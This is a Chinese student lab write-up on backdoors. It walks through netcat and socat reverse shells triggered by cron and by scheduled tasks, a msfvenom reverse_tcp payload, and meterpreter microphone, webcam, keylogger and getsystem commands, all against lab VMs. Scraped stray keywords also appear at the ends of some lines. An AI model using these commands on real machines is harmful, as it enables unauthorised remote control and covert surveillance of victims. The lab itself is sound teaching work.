2018-2019-2 網絡對抗技術 20165231 Exp2 後門原理與實踐

實驗內容

1.使用netcat獲取主機操做Shell,cron啓動
2.使用socat獲取主機操做Shell, 任務計劃啓動
3.使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
4.使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
5.使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shellhtml

基礎問答

(1)例舉你能想到的一個後門進入到你係統中的可能方式?linux

  • 網站捆綁下載

(2)例舉你知道的後門如何啓動起來(win及linux)的方式?web

  • 修改註冊表,添加自啓動、修改正常軟件快捷方式的啓動路徑

(3)Meterpreter有哪些給你映像深入的功能?shell

  • 奪取開啓攝像頭、麥克風等設備權限,讀取鍵盤內容

(4)如何發現本身有系統有沒有被安裝後門?windows

  • 電腦安全軟件掃描、查看自啓項有無異常程序

實驗過程

經常使用後門工具測試

ncat

Linux得到Windows Shell
  • 首先在查看kali虛擬機的IP地址ifconfig(這裏和win的ipconfig有所區別)
  • kali使用nc指令監聽端口:nc -l -p 5231
  • Windows上使用ncat.exe程序的-e選項項反向鏈接Kali主機的端口:ncat.exe -e cmd.exe 192.168.70.131 5231
  • kali:得到win7 Windows Shell
Windows得到Linux Shell
  • Windows:使用ipconfig指令查看本機IP:192.168.70.130
  • 使用ncat.exe程序監聽本機的端口:ncat.exe -l -p 5231
  • kali:使用nc指令的-e選項反向鏈接Windows主機的端口:ncat 192.168.70.130 5231 -e /bin/sh
  • Windows獲取kali shell
用nc傳輸數據
  • 在Windows下監聽端口:ncat.exe -l 5231
  • kali下鏈接到Windows的端口:nc 192.168.70.130 5231
    以後就能夠雙向傳輸文字
用nc傳輸文件
  • Windows下監聽端口,把收到的數據保存到wyhy.out中:ncat.exe -l 5231 > wyhy.out
  • kali下先建立wyhy.in文件,再反彈鏈接到Windows的端口:nc 192.168.70.130 5231 < wyhy.in
    傳輸成功後kali裏建立的文件的內容就會在Windows同名文件中出現。

一、使用netcat獲取主機操做Shell,cron啓動

先在win7系統下,監聽端口:ncat.exe -l -p 5231
在kali下,使用man cron查看crontab命令的幫助文檔

 安全

  • crontab指令能夠用於設置週期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供以後讀取和執行。

crontab -e指令編輯一條定時任務

在最後一行添加18 * * * * /bin/netcat 192.168.70.131 -e /bin/sh,意思是在每一個小時的第18分鐘反向鏈接Windows主機的端口bash

在時間沒到的時候不管你在Windows那邊怎麼輸都是沒有反應的,可是在時間到的一刻你輸入的全部都會瞬間顯示在頻幕上網絡


二、使用socat獲取主機操做Shell, 任務計劃啓動

  • 在Windows系統下,打開控制面板>系統和安全>管理工具>任務計劃程序>建立任務在觸發器選項開始任務選項選擇工做站鎖定時

    在操做選項卡填入socat的路徑,參數填tcp-listen:XX exec:cmd.exe,pty,stderr(XX爲本身設定端口號)


建立完成後鎖定Windows,而後去kali
在kali輸入socat - tcp:windows IP:端口號此時能夠發現已經成功得到了一個cmd shell(這裏可能須要作兩次,Windows初次使用socat會有彈窗提示是否容許使用網絡,然而你鎖了Windows啥都不知道,不成功就倒回去Windows看看吧)
 tcp

三、使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

在kali中輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali IP LPORT=XXXX -f exe > 20165231_backdoor.exe生成後門
 工具

在Windows下執行ncat.exe -l 5231 > 20165231_backdoor.exe,被控主機進入接收文件模式

在kali中經過nc windows ip:XXXX < 20165230_backdoor.exe將生成的後門程序傳送到Windows主機上
在kali上使用msfconsole指令進入msf控制檯

設置監聽模塊

use exploit/multi/handler //使用監聽模塊,設置payload
set payload windows/meterpreter/reverse_tcp //使用和生成後門程序時相同的payload
set LHOST 192.168.70.131 //這裏用的是LinuxIP,和生成後門程序時指定的IP相同
set LPORT 5231 //一樣要使用相同的端口


設置完成後,執行監聽exploit而後在Windows上雙擊以前生成的文件
此時kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell

四、使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

使用record_mic指令截獲一段音頻

使用webcam_snap指令可使用攝像頭進行拍照:

使用webcam stream指令可使用攝像頭進行錄像:
使用screenshot指令能夠進行截屏:

使用keyscan_start指令開始,在windows中記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:

先使用getuid指令查看當前用戶,使用getsystem指令進行提權,如圖所示,提權成功

實驗遇到的問題

一、使用MSF meterpreter調用攝像頭時顯示操做失敗:1411
解決:虛擬機關聯到物理機的攝像頭,在VM虛擬機右下加有個U盤標誌,右鍵鏈接就關聯上物理機上的設備了。若是右下角沒有U盤標誌,那就在虛擬機設置裏面添加就ok了。

實驗感想

我之前一直覺得只要防火牆,安全軟件安好就必定不會有什麼被入侵的可能。看來我仍是太年輕了,咱們這種初學的小米渣在win7沒關防火牆狀況下都能依葫蘆畫瓢完成滲透,若不是攝像頭啓動有指示燈,神不知鬼不覺都被拍了。不過對於目前的渣渣技術想要徹底滲透到別人的系統裏除了這些技術看來還得用上社會工程學才能得手啊。

相關文章
相關標籤/搜索